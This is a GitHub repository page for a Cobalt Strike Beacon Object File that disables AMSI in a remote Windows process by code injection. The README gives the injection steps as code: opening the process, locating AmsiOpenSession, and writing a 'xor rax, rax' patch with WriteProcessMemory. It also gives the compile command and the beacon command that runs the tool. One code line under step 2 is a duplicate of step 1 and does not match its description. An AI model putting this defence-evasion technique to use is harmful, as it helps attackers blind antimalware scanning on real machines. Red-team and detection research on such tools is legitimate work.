Skip to content
/ injectAmsiBypass Public

Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

License

MIT license
377 stars 68 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

boku7/injectAmsiBypass

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
images
images
 
 
LICENSE.md
LICENSE.md
 
 
README.md
README.md
 
 
beacon.h
beacon.h
 
 
inject-amsiBypass.c
inject-amsiBypass.c
 
 
inject-amsiBypass.cna
inject-amsiBypass.cna
 
 

Repository files navigation

Cobalt Strike BOF - Inject AMSI Bypass

Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.

Running inject-amsiBypass BOF from CobaltStrike

What does this do?

1. Use supplied PID argument to get a handle on the remote process
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
  • Both beacon and the target process will both have the same address for the symbol.
  • If AMSI.DLL does not exist in the remote process, running this may crash the target process.
3. Write the AMSI bypass to the remote processes memory
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);

Method = AMSI.AmsiOpenSession

Proof of Concept Demo Screenshots

Before - Powershell.exe AMSI.AmsiOpenSession

After - Powershell.exe AMSI.AmsiOpenSession

Compile with x64 MinGW:

x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o

Run from Cobalt Strike Beacon Console

beacon> inject-amsiBypass <PID>
  • Make sure to load the inject-amsiBypass.cna script into Cobalt Strikes Script Manager

To Do List

  • Check that AMSI.DLL exists in remote process before injection
  • Add other AMSI bypasses to inject
  • Support x86

Credits / References

Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References
ajpc500/BOFs
trustedsec/CS-Situational-Awareness-BOF
Sektor7 Malware Dev Essentials course
Offensive Security OSEP

About

Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

Resources

Readme

License

MIT license
Activity

Stars

377 stars

Watchers

12 watching

Forks

68 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages